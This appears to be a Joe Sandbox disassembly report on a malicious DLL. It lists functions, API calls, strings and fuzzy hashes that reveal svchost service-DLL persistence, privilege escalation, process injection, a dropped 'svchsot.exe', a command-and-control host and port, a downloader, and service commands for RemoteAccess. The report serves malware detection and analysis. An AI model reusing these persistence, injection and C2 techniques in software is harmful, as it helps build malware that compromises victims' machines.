Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d8292dab876d3856fe77b003576302b6b8b57554ab1a7fa92ce49e5c0b0693b
Instruction ID: aa392b9c8528f05fc8196833d7f7bb75810528e03076ef8e7fbf563dca482b86
Opcode Fuzzy Hash: 5d8292dab876d3856fe77b003576302b6b8b57554ab1a7fa92ce49e5c0b0693b
Instruction Fuzzy Hash: C8315222BB90A207E354CEBD9CC4277B793D7CA246B6DC67CD588C7A1EC83AD8075250

Function 10008130 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 270COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 10008220

Strings

ServiceDll, xrefs: 1000830D
SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 100082BD
RegSetValueEx(Svchost\krnlsrvc), xrefs: 100083E1
Description, xrefs: 1000829B
RegSetValueEx(ServiceDll), xrefs: 1000832F
RegOpenKeyEx(Svchost), xrefs: 100083A4
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 1000835A
%SystemRoot%\System32\svchost.exe -k , xrefs: 10008175
SYSTEM\CurrentControlSet\Services\%s, xrefs: 10008267

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID: %SystemRoot%\System32\svchost.exe -k $Description$RegOpenKeyEx(Svchost)$RegSetValueEx(ServiceDll)$RegSetValueEx(Svchost\krnlsrvc)$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
API String ID: 1452528299-660433390
Opcode ID: 8ce3f485e2619df90460e7d732da1ec02d01a7549e0fcbc983bce7ed636aae29
Instruction ID: 33b863a364d67099490300b6d63850c99dec98ee91fa7a2b0d88b42f6c8783bc
Opcode Fuzzy Hash: 8ce3f485e2619df90460e7d732da1ec02d01a7549e0fcbc983bce7ed636aae29
Instruction Fuzzy Hash: 9E919671A00158ABEB15CBA4CC85BEE77E9FB88750F154269FA05E72C0DF749E41CB60

Function 10006330 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 211filesleepinjectionCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 100063C2
wsprintfA.USER32 ref: 10006434
wsprintfA.USER32 ref: 1000644D
CreateDirectoryA.KERNEL32(?,00000000), ref: 1000645C
WriteProcessMemory.KERNEL32(00000000,?,?,00000009,00000000), ref: 1000649A
time.MSVCRT(00000000), ref: 100064B7
srand.MSVCRT ref: 100064BE
rand.MSVCRT ref: 100064C7
rand.MSVCRT ref: 100064D5
rand.MSVCRT ref: 100064E3
rand.MSVCRT ref: 100064F1
rand.MSVCRT ref: 100064FF
rand.MSVCRT ref: 1000650D
wsprintfA.USER32 ref: 10006525
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 1000653E
CloseHandle.KERNEL32(00000000), ref: 10006545
Sleep.KERNEL32(000003E8), ref: 10006550
DeleteFileA.KERNEL32(?), ref: 1000655B

Strings

c:\windows\system32\drivers\etc\%c%c%c.%c%c%c, xrefs: 1000651F
c:\windows\system32\drivers\%s\%s, xrefs: 10006447
c:\windows\system32\drivers\%s, xrefs: 1000642E
%s\%s, xrefs: 100063BB

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: rand$wsprintf$CreateFile$CloseDeleteDirectoryHandleMemoryProcessSleepWritesrandtime
String ID: %s\%s$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s$c:\windows\system32\drivers\etc\%c%c%c.%c%c%c
API String ID: 3377497938-1917988604
Opcode ID: 0dba42889dc0f8d7b8647c302bd0f7389d4fc49d2d206becb2fc758216d159f0
Instruction ID: c69659560551726c28aa303df1a51e06c88e31100adfc53adbd4189e51445300
Opcode Fuzzy Hash: 0dba42889dc0f8d7b8647c302bd0f7389d4fc49d2d206becb2fc758216d159f0
Instruction Fuzzy Hash: C661C175204345AFE724CB64CC85BEAB7E6EBCC310F048A2CF64597295DB78E6488652

Function 10006A50 Relevance: 36.8, APIs: 7, Strings: 14, Instructions: 96stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 10006A7E
GetModuleFileNameA.KERNEL32(00000000,c:\windows\SysWOW64\rundll32.exe,00000104,1000BB2D), ref: 10006A95
GetModuleFileNameA.KERNEL32(10000000,c:\ijbbn\gduol.dll,00000104), ref: 10006AA7
strrchr.MSVCRT ref: 10006AD5
wsprintfA.USER32 ref: 10006AED
wsprintfA.USER32 ref: 10006AFE
wsprintfA.USER32 ref: 10006B0F

Strings

c:\windows\SysWOW64\rundll32.exe, xrefs: 10006A8E
%s.txt, xrefs: 10006A74
c:\ijbbn\gduol.dll, xrefs: 10006AA1, 10006AA9
09121307, xrefs: 10006A6F
09121307.txt, xrefs: 10006A79
krnaver.com:6520, xrefs: 10006B00
%s\version.txt, xrefs: 10006AF4
%s\ReadMe.txt, xrefs: 10006AE0
c:\ijbbn\ReadMe.txt, xrefs: 10006AE5
Mkrnaver.com:6520, xrefs: 10006B0A
M%s, xrefs: 10006B05
c:\ijbbn\version.txt, xrefs: 10006AF9
c:\ijbbn, xrefs: 10006ABB, 10006AC4, 10006ADB, 10006AEF
ECF4BB82F7E0, xrefs: 10006B55

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: wsprintf$FileModuleName$strrchr
String ID: %s.txt$%s\ReadMe.txt$%s\version.txt$09121307$09121307.txt$ECF4BB82F7E0$M%s$Mkrnaver.com:6520$c:\ijbbn$c:\ijbbn\ReadMe.txt$c:\ijbbn\gduol.dll$c:\ijbbn\version.txt$c:\windows\SysWOW64\rundll32.exe$krnaver.com:6520
API String ID: 1444062329-1821818250
Opcode ID: fd1de15f43c206347c2ac9a46dc33d443f248e52294ce5f81c6693700653e1e0
Instruction ID: 04d4b27928b3db94c91fa8a3f6c5c52e8812e2580820e9d4d8c6f0595a90b4de
Opcode Fuzzy Hash: fd1de15f43c206347c2ac9a46dc33d443f248e52294ce5f81c6693700653e1e0
Instruction Fuzzy Hash: D521F671640A116FE318DB798C41FAA7AD1EB88320F554319F7169F2C1CBB4DD85C654

Function 1000F6F0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

_mbsicmp.MSVCRT ref: 1000F72E
_mbsicmp.MSVCRT ref: 1000F742
_mbsicmp.MSVCRT ref: 1000F756
_mbsicmp.MSVCRT ref: 1000F76A

Strings

.zoo, xrefs: 1000F750
.arj, xrefs: 1000F78C
.arc, xrefs: 1000F764
.zip, xrefs: 1000F73C
.lzh, xrefs: 1000F778
.gz, xrefs: 1000F7A0
.tgz, xrefs: 1000F7B4

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: _mbsicmp
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1961004622-51310709
Opcode ID: 808ecf9ba61cca7d35e01d6ffb931e7b3765451d2e58726d03ba59bcbd5b0318
Instruction ID: ee2a091052f8c3b86a9c7290411a3b224c3c8ade4836fbf502385ceb4bcfd2c4
Opcode Fuzzy Hash: 808ecf9ba61cca7d35e01d6ffb931e7b3765451d2e58726d03ba59bcbd5b0318
Instruction Fuzzy Hash: 6B21A22260816221BA00B52D7C406EE93C8CFE20E6B07403BFD58D9A19FB55DDC3A4E7

Function 10005030 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 10005069

Part of subcall function 10004DA0: CreateFileA.KERNEL32(?,MZ@,00000007,00000000,00000004,00000080,00000000), ref: 10004E62
Part of subcall function 10004DA0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004E78
Part of subcall function 10004DA0: time.MSVCRT(00000000), ref: 10004E7F
Part of subcall function 10004DA0: _localtime32.MSVCRT(?), ref: 10004E8E
Part of subcall function 10004DA0: strftime.MSVCRT ref: 10004EA1
Part of subcall function 10004DA0: vsprintf.MSVCRT ref: 10004EF3
Part of subcall function 10004DA0: sprintf.MSVCRT ref: 10004F13

Strings

C:\Windows\6C4DA6FB\svchsot.vir, xrefs: 100050BF
self, xrefs: 1000507A
%s.%d, xrefs: 10005102
C:\Windows\6C4DA6FB\svchsot.exe, xrefs: 100050B0, 100050C4
cmd.exe, xrefs: 10005040, 10005050

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: File$CreateCurrentPointerProcess_localtime32sprintfstrftimetimevsprintf
String ID: %s.%d$C:\Windows\6C4DA6FB\svchsot.exe$C:\Windows\6C4DA6FB\svchsot.vir$cmd.exe$self
API String ID: 3192119092-4191049792
Opcode ID: ec2b08bf7f1156d9c8dcfe4d16c6df7a8508a6621eb8c1214a1196f4b0e722e6
Instruction ID: 7fa6494ac43d5dcc9c5c53410437834f8a30d40188a99b7aa6c5cd6ec2dc6e24
Opcode Fuzzy Hash: ec2b08bf7f1156d9c8dcfe4d16c6df7a8508a6621eb8c1214a1196f4b0e722e6
Instruction Fuzzy Hash: D8112BB26402147BF3119754EC8ABEA3348DF84362F414131F70496181DA76E5A8C6B7

Function 1000A9F0 Relevance: 19.6, APIs: 2, Strings: 9, Instructions: 338COMMON

Download Yara Rule

Strings

REG_EXPAND_SZ, xrefs: 1000AD5F
JS0yNHMgJS0xNXMgMHgleCglZCkgXHJcbg==, xrefs: 1000ADA7
REG_BINARY, xrefs: 1000ADE9
JS0yNHMgJS0xNXMgXHJcbg==, xrefs: 1000ADD2, 1000ADF5
[%s], xrefs: 1000AC75
JS0yNHMgJS0xNXMgJXMgXHJcbg==, xrefs: 1000AD6B
REG_MULTI_SZ, xrefs: 1000ADC6
REG_SZ, xrefs: 1000AD51
REG_DWORD, xrefs: 1000AD9B

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Open
String ID: JS0yNHMgJS0xNXMgJXMgXHJcbg==$JS0yNHMgJS0xNXMgMHgleCglZCkgXHJcbg==$JS0yNHMgJS0xNXMgXHJcbg==$REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$[%s]
API String ID: 71445658-1435378120
Opcode ID: bd973036ceaf793e645ef01d76d6486dd3db76796ff37db88c669a367f4bbfe9
Instruction ID: 3f2a93cd4c3d7343f0a580605e2b8078640624975132d2b922564d29651d2999
Opcode Fuzzy Hash: bd973036ceaf793e645ef01d76d6486dd3db76796ff37db88c669a367f4bbfe9
Instruction Fuzzy Hash: 7CC1A8B6900158AFEB14CF94DC41FDFB3B9EB89350F004299F619A7184EB74AE84CB91

Function 10006710 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Part of subcall function 10006090: strrchr.MSVCRT ref: 1000610E
Part of subcall function 10006090: strncpy.MSVCRT ref: 10006125
Part of subcall function 10006090: strncpy.MSVCRT ref: 1000612F
Part of subcall function 10006090: GetSystemInfo.KERNEL32(?), ref: 10006139
Part of subcall function 10006090: GetCurrentProcess.KERNEL32(00000020,?), ref: 1000615A
Part of subcall function 10006090: OpenProcessToken.ADVAPI32(00000000), ref: 10006161
Part of subcall function 10006090: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 10006172
Part of subcall function 10006090: AdjustTokenPrivileges.ADVAPI32 ref: 100061A7
Part of subcall function 10006090: CloseHandle.KERNEL32(00000010), ref: 100061B2
Part of subcall function 10006090: sscanf.MSVCRT ref: 100061DD

wsprintfA.USER32 ref: 10006752

Part of subcall function 100061F0: strchr.MSVCRT ref: 10006246

wsprintfA.USER32 ref: 100067B8
wsprintfA.USER32 ref: 100067D1
CreateDirectoryA.KERNEL32(?,00000000), ref: 100067DC

Part of subcall function 10005130: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,100094AF,?,?,?), ref: 10005149
Part of subcall function 10005130: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000516B
Part of subcall function 10005130: CloseHandle.KERNEL32(00000000), ref: 10005172

OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 1000681A
CreateThread.KERNEL32(00000000,00000000,100065E0,00000000,00000000,00000000), ref: 10006841

Strings

c:\windows\system32\drivers\%s\%s, xrefs: 100067CB
c:\windows\system32\drivers\%s, xrefs: 100067B1
ROOT\CIMv2, xrefs: 100067FC
Win32_process, xrefs: 100067F7
%s\%s, xrefs: 1000674C

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CreateProcesswsprintf$CloseFileHandleOpenTokenstrncpy$AdjustCurrentDirectoryInfoLookupPrivilegePrivilegesSystemThreadValueWritesscanfstrchrstrrchr
String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
API String ID: 3642037362-1421401311
Opcode ID: 959fb8fba947e54388e467c1008752361763f84d015db73d1a953f87127b373f
Instruction ID: 4b2977ad490d08696dca791de939d207079566f8b39031e4ddb8eae90f5a8ad1
Opcode Fuzzy Hash: 959fb8fba947e54388e467c1008752361763f84d015db73d1a953f87127b373f
Instruction Fuzzy Hash: FA31BF71504344BBE321CBA8CD84AEBBB9AEB8D340F40492DF25597242DB35E944CB63

Function 10011A56 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 187librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 10011AFC
GetLastError.KERNEL32 ref: 10011B08
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 10011B3B
InterlockedExchange.KERNEL32(?,00000000), ref: 10011B4D
LocalAlloc.KERNEL32(00000040,00000008), ref: 10011B61
FreeLibrary.KERNEL32(00000000), ref: 10011B7E
GetProcAddress.KERNEL32(?,?), ref: 10011BDF
GetLastError.KERNEL32 ref: 10011BEB
RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 10011C1D

Strings

$, xrefs: 10011A72

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorExceptionLastLibraryRaise$AddressAllocExchangeFreeInterlockedLoadLocalProc
String ID: $
API String ID: 991255547-3993045852
Opcode ID: a73b7cc8c625f911e0734331049b328756f35cc78c5a687038707bc00ce3fec9
Instruction ID: a354a1ddeb452cab2ad2ab051f5ed65d06ba3f599703faf405cad435a4b3e081
Opcode Fuzzy Hash: a73b7cc8c625f911e0734331049b328756f35cc78c5a687038707bc00ce3fec9
Instruction Fuzzy Hash: BA612DB5A0420A9FEB19CF99C8C1AEA77F5EB48350F11812DE905DB251E770EE84CB60

Function 10008A70 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 177networkCOMMON

Download Yara Rule

APIs

Part of subcall function 100075F0: strstr.MSVCRT ref: 1000769B
Part of subcall function 100075F0: strstr.MSVCRT ref: 100076BF
Part of subcall function 100075F0: strcspn.MSVCRT ref: 100076CE
Part of subcall function 100075F0: strstr.MSVCRT ref: 100076DA
Part of subcall function 100075F0: strcspn.MSVCRT ref: 100076E9
Part of subcall function 100075F0: strncpy.MSVCRT ref: 100076F2
Part of subcall function 100075F0: strstr.MSVCRT ref: 1000772F
Part of subcall function 100075F0: strcspn.MSVCRT ref: 10007742

Part of subcall function 10006B90: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 10006BA7

Part of subcall function 10006F20: RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,?), ref: 10006F4F
Part of subcall function 10006F20: GlobalMemoryStatusEx.KERNEL32(?), ref: 10007009
Part of subcall function 10006F20: GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 10007062

send.WS2_32(00000000,?,00000128,00000000), ref: 10008ADF
closesocket.WS2_32(00000000), ref: 10008AEB
select.WS2_32 ref: 10008B41
closesocket.WS2_32(00000000), ref: 10008C33
InterlockedExchange.KERNEL32(1001B6A0,00000001), ref: 10008C44

Strings

SeShutdownPrivilege, xrefs: 10008BC7, 10008BE3
zip, xrefs: 10008C85

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: strstr$strcspn$closesocket$DefaultExchangeGlobalInterlockedLanguageMemoryOpenStatusSystemselectsendsetsockoptstrncpy
String ID: SeShutdownPrivilege$zip
API String ID: 619725691-4289258210
Opcode ID: b5eb4e8b9dd09d5d0053c07554e98b6b0746b7bdf66f2196c35ecf5b0e9c48ff
Instruction ID: 7a5603a2a2216d2e1622d78d4c03b43238dfd1876f0237c8316e7908159126a5
Opcode Fuzzy Hash: b5eb4e8b9dd09d5d0053c07554e98b6b0746b7bdf66f2196c35ecf5b0e9c48ff
Instruction Fuzzy Hash: 0551D6B1544305AAF320DB648C85FEB76E9FB843D0F104929FA49D91C6EB74E644CBB2

Function 10007F10 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 99registrystringCOMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(?,100147E8), ref: 10007F95
_CxxThrowException.MSVCRT(?,100147E8), ref: 10007FCD
lstrlen.KERNEL32(?,00000000), ref: 10007FF3
RegCloseKey.ADVAPI32(?), ref: 10008032

Strings

DLLPath, xrefs: 10007FAD, 10007FFD
U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFJlbW90ZUFjY2Vzc1xSb3V0ZXJNYW5hZ2Vyc1xJcA==, xrefs: 10007F36
sc stop RemoteAccess, xrefs: 10008017
sc config RemoteAccess start= auto, xrefs: 1000801F
net start RemoteAccess, xrefs: 10008027
mp3, xrefs: 10007FDE

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionThrow$Closelstrlen
String ID: DLLPath$U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFJlbW90ZUFjY2Vzc1xSb3V0ZXJNYW5hZ2Vyc1xJcA==$mp3$net start RemoteAccess$sc config RemoteAccess start= auto$sc stop RemoteAccess
API String ID: 3791885085-2251003411
Opcode ID: 227bc0d59e87b544e9a4350b435364f5be94054d25a6f426c0a1255110e25bea
Instruction ID: 2c55f4b9fb6ebaf0e1eefe4f580e625848e4f0b506e702ed55fb943b6aebbeff
Opcode Fuzzy Hash: 227bc0d59e87b544e9a4350b435364f5be94054d25a6f426c0a1255110e25bea
Instruction Fuzzy Hash: 063181B5900159AFEB10DF94CC85FEFBBB8FF49250F004169F604AA141D7749E848BA1

Function 10007250 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 131libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(urlmon.dll,00000001,00000001,?), ref: 10007267
LoadLibraryA.KERNEL32(wininet.dll), ref: 10007270
GetProcAddress.KERNEL32(00000000,URLDownloadToCacheFileA), ref: 10007299
GetProcAddress.KERNEL32(00000000,GetUrlCacheEntryInfoA), ref: 100072A4

Strings

GetUrlCacheEntryInfoA, xrefs: 1000729B
wininet.dll, xrefs: 10007269
urlmon.dll, xrefs: 10007262
WinSta0\Default, xrefs: 100073A2
URLDownloadToCacheFileA, xrefs: 10007288

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
API String ID: 2574300362-1569318151
Opcode ID: 04083978eb23d12a34f0fee697af90656df796dc382c12a5cf3d9f7be74f32bc
Instruction ID: c0467908c50afa1d83c3b06bf8344a948e458b4db3363e6c89df874e13e7bd38
Opcode Fuzzy Hash: 04083978eb23d12a34f0fee697af90656df796dc382c12a5cf3d9f7be74f32bc
Instruction Fuzzy Hash: CC41CC31A0051C6BDB25C6B8CC51BEF7666FB88320F550369F716AB2C1DAF15E45CB44

Function 10008440 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 30synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 10004F60: GetCurrentProcess.KERNEL32(00000028,00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F6A
Part of subcall function 10004F60: OpenProcessToken.ADVAPI32(00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F71
Part of subcall function 10004F60: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10004F87
Part of subcall function 10004F60: AdjustTokenPrivileges.KERNELBASE ref: 10004FCA
Part of subcall function 10004F60: CloseHandle.KERNEL32 ref: 10004FD5

CreateMutexA.KERNEL32(00000000,00000001,Global\98012trt8-d8dfsf,?,100084BC), ref: 1000845B
GetLastError.KERNEL32(?,100084BC), ref: 10008463
ReleaseMutex.KERNEL32(00000000,?,?,?,100084BC), ref: 1000848D
CloseHandle.KERNEL32(00000000,?,?,?,100084BC), ref: 10008494

Strings

SeDebugPrivilege, xrefs: 10008444
c:\11.txt, xrefs: 1000847A
Global\98012trt8-d8dfsf, xrefs: 10008453
ERROR_ALREADY_EXISTS, xrefs: 10008475

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

